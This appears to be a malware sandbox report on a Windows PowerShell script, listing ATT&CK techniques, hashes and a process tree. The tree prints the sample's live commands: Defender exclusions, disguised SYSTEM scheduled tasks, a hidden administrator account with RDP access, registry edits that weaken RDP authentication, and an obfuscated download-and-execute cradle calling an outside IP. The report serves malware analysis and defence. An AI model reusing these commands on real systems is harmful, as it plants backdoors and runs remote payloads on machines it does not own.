c3255374e2871058472680b594d0eadbfd73c0de7494214576d7796dd1b05a92

Analysis

max time kernel
122s
max time network
128s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
27-11-2024 03:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c3255374e2871058472680b594d0eadbfd73c0de7494214576d7796dd1b05a92.ps1
Size

4KB
MD5

3f5f652952ced2761ef056b5a11b8896
SHA1

186bf77a973d93fde13aeb7beeebded71188bd91
SHA256

c3255374e2871058472680b594d0eadbfd73c0de7494214576d7796dd1b05a92
SHA512

46ec872ff49ce3fd8ef25de88c616ce0dc6025b8c1b43a43f0a8c9a4e45974de234efee2a9406162589bbeed93ad26d5fe432ae5deecaddd5f9a5e1d3516982e
SSDEEP

96:VerCwM6AqiyYT4PVvp8VcxCOTjb1ZU2WuKaMYAbGwIEKER:VeWdBqiyYqRRJTw2HKaLAztPR

Score

9^/10

defense_evasion discovery execution lateral_movement

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 4 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
1656	net1.exe
1540	net.exe
780	net1.exe
1288	net.exe

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	2860	powershell.exe
7	1128	powershell.exe
8	2996	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2860	powershell.exe
2996	powershell.exe
1128	powershell.exe
2952	powershell.exe
3008	powershell.exe
1604	powershell.exe

Indicator Removal: Network Share Connection Removal 1 TTPs 2 IoCs

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

defense_evasion

Network Share Connection Removal

T1070.005

pid	Process
2024	net.exe
2432	net1.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google Chrome.lnk	powershell.exe

Drops file in System32 directory 6 IoCs

description	ioc	Process
File created	C:\Windows\System32\sysmon2.bat	cmd.exe
File opened for modification	C:\Windows\System32\sysmon2.bat	cmd.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\System32\sysmon.bat	cmd.exe
File opened for modification	C:\Windows\System32\sysmon.bat	cmd.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
2764	tasklist.exe

Hide Artifacts: Hidden Users 1 TTPs 1 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\_BootUEFI_ = "0"	reg.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
332	ipconfig.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2128	systeminfo.exe

Modifies data under HKEY_USERS 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Terminal Server Client	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Terminal Server Client\AuthenticationLevelOverride = "0"	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 10c1d8b07840db01	powershell.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2508	schtasks.exe
584	schtasks.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
2860	powershell.exe
2860	powershell.exe
2860	powershell.exe
2952	powershell.exe
2860	powershell.exe
2860	powershell.exe
2860	powershell.exe
1604	powershell.exe
2996	powershell.exe
3008	powershell.exe
1128	powershell.exe
2860	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	2860	powershell.exe
Token: SeDebugPrivilege	2952	powershell.exe
Token: SeDebugPrivilege	1604	powershell.exe
Token: SeDebugPrivilege	2996	powershell.exe
Token: SeDebugPrivilege	3008	powershell.exe
Token: SeDebugPrivilege	1128	powershell.exe
Token: SeDebugPrivilege	2764	tasklist.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2860 wrote to memory of 2952	2860	powershell.exe	31
PID 2860 wrote to memory of 2952	2860	powershell.exe	31
PID 2860 wrote to memory of 2952	2860	powershell.exe	31
PID 2860 wrote to memory of 2708	2860	powershell.exe	33
PID 2860 wrote to memory of 2708	2860	powershell.exe	33
PID 2860 wrote to memory of 2708	2860	powershell.exe	33
PID 2708 wrote to memory of 1604	2708	cmd.exe	35
PID 2708 wrote to memory of 1604	2708	cmd.exe	35
PID 2708 wrote to memory of 1604	2708	cmd.exe	35
PID 2708 wrote to memory of 1600	2708	cmd.exe	36
PID 2708 wrote to memory of 1600	2708	cmd.exe	36
PID 2708 wrote to memory of 1600	2708	cmd.exe	36
PID 2708 wrote to memory of 1060	2708	cmd.exe	37
PID 2708 wrote to memory of 1060	2708	cmd.exe	37
PID 2708 wrote to memory of 1060	2708	cmd.exe	37
PID 2708 wrote to memory of 2508	2708	cmd.exe	38
PID 2708 wrote to memory of 2508	2708	cmd.exe	38
PID 2708 wrote to memory of 2508	2708	cmd.exe	38
PID 2860 wrote to memory of 2996	2860	powershell.exe	39
PID 2860 wrote to memory of 2996	2860	powershell.exe	39
PID 2860 wrote to memory of 2996	2860	powershell.exe	39
PID 2708 wrote to memory of 2928	2708	cmd.exe	41
PID 2708 wrote to memory of 2928	2708	cmd.exe	41
PID 2708 wrote to memory of 2928	2708	cmd.exe	41
PID 2696 wrote to memory of 2096	2696	taskeng.exe	43
PID 2696 wrote to memory of 2096	2696	taskeng.exe	43
PID 2696 wrote to memory of 2096	2696	taskeng.exe	43
PID 2096 wrote to memory of 2036	2096	cmd.exe	45
PID 2096 wrote to memory of 2036	2096	cmd.exe	45
PID 2096 wrote to memory of 2036	2096	cmd.exe	45
PID 2096 wrote to memory of 2224	2096	cmd.exe	46
PID 2096 wrote to memory of 2224	2096	cmd.exe	46
PID 2096 wrote to memory of 2224	2096	cmd.exe	46
PID 2096 wrote to memory of 584	2096	cmd.exe	48
PID 2096 wrote to memory of 584	2096	cmd.exe	48
PID 2096 wrote to memory of 584	2096	cmd.exe	48
PID 2996 wrote to memory of 332	2996	powershell.exe	49
PID 2996 wrote to memory of 332	2996	powershell.exe	49
PID 2996 wrote to memory of 332	2996	powershell.exe	49
PID 2996 wrote to memory of 2464	2996	powershell.exe	50
PID 2996 wrote to memory of 2464	2996	powershell.exe	50
PID 2996 wrote to memory of 2464	2996	powershell.exe	50
PID 2464 wrote to memory of 2248	2464	net.exe	51
PID 2464 wrote to memory of 2248	2464	net.exe	51
PID 2464 wrote to memory of 2248	2464	net.exe	51
PID 2996 wrote to memory of 2388	2996	powershell.exe	52
PID 2996 wrote to memory of 2388	2996	powershell.exe	52
PID 2996 wrote to memory of 2388	2996	powershell.exe	52
PID 2388 wrote to memory of 2452	2388	query.exe	53
PID 2388 wrote to memory of 2452	2388	query.exe	53
PID 2388 wrote to memory of 2452	2388	query.exe	53
PID 2996 wrote to memory of 2128	2996	powershell.exe	54
PID 2996 wrote to memory of 2128	2996	powershell.exe	54
PID 2996 wrote to memory of 2128	2996	powershell.exe	54
PID 2096 wrote to memory of 1628	2096	cmd.exe	55
PID 2096 wrote to memory of 1628	2096	cmd.exe	55
PID 2096 wrote to memory of 1628	2096	cmd.exe	55
PID 2696 wrote to memory of 1608	2696	taskeng.exe	56
PID 2696 wrote to memory of 1608	2696	taskeng.exe	56
PID 2696 wrote to memory of 1608	2696	taskeng.exe	56
PID 1608 wrote to memory of 1732	1608	cmd.exe	58
PID 1608 wrote to memory of 1732	1608	cmd.exe	58
PID 1608 wrote to memory of 1732	1608	cmd.exe	58
PID 1732 wrote to memory of 2152	1732	net.exe	59

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\c3255374e2871058472680b594d0eadbfd73c0de7494214576d7796dd1b05a92.ps1
1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2860
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2952
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\scheduler-once.bat"
  2⤵
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
  PID:2708
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -w hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAJABlAG4AdgA6AHcAaQBuAGQAaQByAFwAUwB5AHMAdABlAG0AMwAyACIA
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1604
- - C:\Windows\system32\schtasks.exe
    schtasks /delete /tn "Intel(R) Ethernet Connection 1219-LM" /f
    3⤵
    PID:1600
- - C:\Windows\system32\schtasks.exe
    schtasks /delete /tn "Intel(R) Ethernet2 Connection 1219-LM" /f
    3⤵
    PID:1060
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "Intel(R) Ethernet2 Connection 1219-LM" /tr "C:\Windows\System32\sysmon2.bat" /ru "SYSTEM" /sc ONSTART /rl HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2508
- - C:\Windows\system32\schtasks.exe
    schtasks /run /tn "Intel(R) Ethernet2 Connection 1219-LM"
    3⤵
    PID:2928
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2996
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /all
    3⤵
    - Gathers network information
    PID:332
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" user
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2464
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user
      4⤵
      PID:2248
- - C:\Windows\system32\query.exe
    "C:\Windows\system32\query.exe" user
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2388
  - - C:\Windows\system32\quser.exe
      "C:\Windows\system32\quser.exe"
      4⤵
      PID:2452
- - C:\Windows\system32\systeminfo.exe
    "C:\Windows\system32\systeminfo.exe"
    3⤵
    - Gathers system information
    PID:2128
- - C:\Windows\system32\tasklist.exe
    "C:\Windows\system32\tasklist.exe"
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:2764
- C:\Windows\system32\wermgr.exe
  "C:\Windows\system32\wermgr.exe" "-outproc" "2860" "1860"
  2⤵
  PID:2644

C:\Windows\system32\taskeng.exe
taskeng.exe {6197273B-954E-480B-BFFE-3A83D777D7F7} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Suspicious use of WriteProcessMemory
PID:2696
- C:\Windows\SYSTEM32\cmd.exe
  C:\Windows\SYSTEM32\cmd.exe /c "C:\Windows\System32\sysmon2.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2096
- - C:\Windows\system32\schtasks.exe
    schtasks /delete /tn "Intel(R) Ethernet Connection 1219-LM2" /f
    3⤵
    PID:2036
- - C:\Windows\system32\schtasks.exe
    schtasks /delete /tn "Intel(R) Ethernet2 Connection 1219-LM2" /f
    3⤵
    PID:2224
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "Intel(R) Ethernet2 Connection 1219-LM2" /tr "C:\Windows\System32\sysmon.bat" /ru "SYSTEM" /sc MINUTE /mo 5 /rl HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:584
- - C:\Windows\system32\schtasks.exe
    schtasks /run /tn "Intel(R) Ethernet2 Connection 1219-LM2"
    3⤵
    PID:1628
- C:\Windows\SYSTEM32\cmd.exe
  C:\Windows\SYSTEM32\cmd.exe /c "C:\Windows\System32\sysmon.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1608
- - C:\Windows\system32\net.exe
    net user _BootUEFI_ /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1732
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user _BootUEFI_ /add
      4⤵
      PID:2152
- - C:\Windows\system32\net.exe
    net user _BootUEFI_ 123456!!! /active:yes /comment:"A account for booting the computer as uefi mode." /fullname:"_BootUEFI_Hosting_ Host Account"
    3⤵
    PID:1700
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user _BootUEFI_ 123456!!! /active:yes /comment:"A account for booting the computer as uefi mode." /fullname:"_BootUEFI_Hosting_ Host Account"
      4⤵
      PID:1800
- - C:\Windows\system32\net.exe
    net localgroup Administrators _BootUEFI_ /add
    3⤵
    PID:2236
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators _BootUEFI_ /add
      4⤵
      PID:1476
- - C:\Windows\system32\net.exe
    net localgroup "Remote Desktop Users" /add
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:1540
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup "Remote Desktop Users" /add
      4⤵
      Remote Service Session Hijacking: RDP Hijacking
      PID:780
- - C:\Windows\system32\net.exe
    net localgroup "Remote Desktop Users" _BootUEFI_ /add
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:1288
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup "Remote Desktop Users" _BootUEFI_ /add
      4⤵
      Remote Service Session Hijacking: RDP Hijacking
      PID:1656
- - C:\Windows\system32\net.exe
    net localgroup "Users" _BootUEFI_ /delete
    3⤵
    - Indicator Removal: Network Share Connection Removal
    PID:2024
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup "Users" _BootUEFI_ /delete
      4⤵
      Indicator Removal: Network Share Connection Removal
      PID:2432
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    3⤵
    PID:1940
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\Client" /v fClientDisableUDP /t REG_DWORD /d 1 /f
    3⤵
    PID:2100
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v _BootUEFI_ /t REG_DWORD /d 0 /f
    3⤵
    - Hide Artifacts: Hidden Users
    PID:2528
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Terminal Server Client" /v AuthenticationLevelOverride /t REG_DWORD /d 0 /f
    3⤵
    - Modifies data under HKEY_USERS
    PID:2580
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f
    3⤵
    PID:884
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
    3⤵
    PID:2576
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ep bypass -w hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAJABlAG4AdgA6AHcAaQBuAGQAaQByAFwAUwB5AHMAdABlAG0AMwAyACIA
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3008
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "[string] $a = {(eliasneliaseeliasw-eliasObeliasjeeliasct neeliast.weliasebeliasCleliasient).eliasdeliasoeliaswnleliasoeliasaeliasdSeliastreliasieliasneliasg('eliasheliasteliasteliasp:eliaselias/eliaselias/1elias54.9elias0.6elias2.24elias8/wHk4tMu9XpWA/eliasaelias.eliaspeliaseliasselias1eliaselias')}; $b=$a.replace('elias','');$c=iex $b;iex $c"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1128

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Account Manipulation

T1098

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Account Manipulation

T1098

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Users

T1564.002

Indicator Removal

T1070

Network Share Connection Removal

T1070.005

Credential Access

Discovery

Permission Groups Discovery

T1069

Local Groups

T1069.001

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\OutofProcReport259487551.txt

Filesize
1KB

MD5
37b0fe07ee5f96c528c73a015ef134cf

SHA1
17f2bf0e61b6e15f005e5e772c66da9e721ff862

SHA256
be6e2735ddb2351ea8d164b44138a77ead45380790d4ede4cc88dbbc3acc9f13

SHA512
02128d9474fe74bde75c6ee4790ef9d130f02672573759cab70d516373b3bffa3219ad064ae480545722f10d6bbda18b88bd58bf06989c14ed26c81e1195a981

Download Submit
C:\Users\Admin\AppData\Local\Temp\k1.bat

Filesize
1KB

MD5
5c9f358175096711a267c17e746390b0

SHA1
128cd0e49b74583d33f224362b2381686739fea7

SHA256
33675909e13fd3378b390d5bf3fb31b094a291223bf2735fe79e8751d61f2f04

SHA512
5392fd524121d76e43fad750581871589655ec5bba56d875c85e2a884a3d2fc1c11b818131ebde34e402dd436a47188d074959d6b6c8632ff227a5692f212510

Download Submit
C:\Users\Admin\AppData\Local\Temp\k2.bat

Filesize
358B

MD5
73ee484b95ae517d099384e0b5f2255a

SHA1
4b7c89b03aa4c57267e041b3a8356bdd5490b2aa

SHA256
fb26e69770508af54bb2755f916859f2c912eaae7b8fe83f163f4450b3f34e92

SHA512
d84cb995fcbe214efa1bd9e236dfc3b9530780aa670ad30b5156d62b1659745dd8d6fbe438297aed58517a2fa1bcb987f203c100bb3477cf7efe4f867a8a342d

Download Submit
C:\Users\Admin\AppData\Local\Temp\scheduler-once.bat

Filesize
758B

MD5
fb201872c7fe90f79e250805f0b9f998

SHA1
e79d432eb71986227814e9b3de4a42d1df1aa418

SHA256
75c075cf9d9a7dba88a2ad74df1dd6f92c4033063eac3f66034831a1a049f1ef

SHA512
9927f60456f285b94e8349bc2f1d5c1f145c8ea590fa2d180108bc0f8872b7640ec15cf6837c1458c557b9b9ad325f5787385ab3687d5ff407110c67a57ccff4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YX6EPLBQVYO2EGHFSQBL.temp

Filesize
7KB

MD5
d9bee771bd76a88e110191155e1acfdd

SHA1
e26e297921b3fe62c224edf83f6b7395939ccf5b

SHA256
4e1ef054e3cc2efe1ac759921395f48f96f0c5baacd488f6c55d5521cd1e35a9

SHA512
6767c5d39d31f361f6423f69b63807e9c3fa60db220755bd6b9f768823e385e75bfcb246c515d5926335a38eae9ebd3fe289cc039a95206ab8756ac05dc714af

Download Submit
C:\Users\Public\documents\id.log

Filesize
78B

MD5
8290e49760d87d83166f8adb49cabe93

SHA1
36aa4e4fb8c60e49cb8cf8df4f7da427305b8430

SHA256
90a1d2695b3544669f296b4472671b6d8880540cb3137788c7f125ec46004771

SHA512
f6155864fa21fe95ff3ece643787bd184042b1a9f3d49c224145812a7d983d1fa72865a2c72ee4b8d726eedb592a6cab21bc51a9c034b7eb6f260abf43bc40d5

Download Submit
C:\Windows\Temp\OneDriveLog\OneDrive.log

Filesize
13KB

MD5
357b8d39abed37ea8928be269b11e2bc

SHA1
0924256c8c88485d0de27488b91cea1756855d1d

SHA256
20b802ff434619410c038359d355931ebd3524a59442b96aa2a1753f12d3137c

SHA512
632661ea3ab1479a767c364e5477b6b510200cf81b621328086981a599a8d877c1355236958a5c089785b23d83b0cab42be1c1085a79909d77e6b1cd6f6a7822

Download Submit
memory/2860-31-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

Filesize
9.6MB

Download
memory/2860-9-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

Filesize
9.6MB

Download
memory/2860-10-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

Filesize
9.6MB

Download
memory/2860-76-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

Filesize
9.6MB

Download
memory/2860-4-0x000007FEF53BE000-0x000007FEF53BF000-memory.dmp

Filesize
4KB

Download
memory/2860-32-0x000000001B670000-0x000000001B6A2000-memory.dmp

Filesize
200KB

Download
memory/2860-33-0x000000001B670000-0x000000001B6A2000-memory.dmp

Filesize
200KB

Download
memory/2860-34-0x000007FEF53BE000-0x000007FEF53BF000-memory.dmp

Filesize
4KB

Download
memory/2860-11-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

Filesize
9.6MB

Download
memory/2860-5-0x000000001B260000-0x000000001B542000-memory.dmp

Filesize
2.9MB

Download
memory/2860-41-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

Filesize
9.6MB

Download
memory/2860-42-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

Filesize
9.6MB

Download
memory/2860-43-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

Filesize
9.6MB

Download
memory/2860-8-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

Filesize
9.6MB

Download
memory/2860-7-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

Filesize
9.6MB

Download
memory/2860-6-0x00000000024E0000-0x00000000024E8000-memory.dmp

Filesize
32KB

Download
memory/2952-19-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

Filesize
9.6MB

Download
memory/2952-30-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

Filesize
9.6MB

Download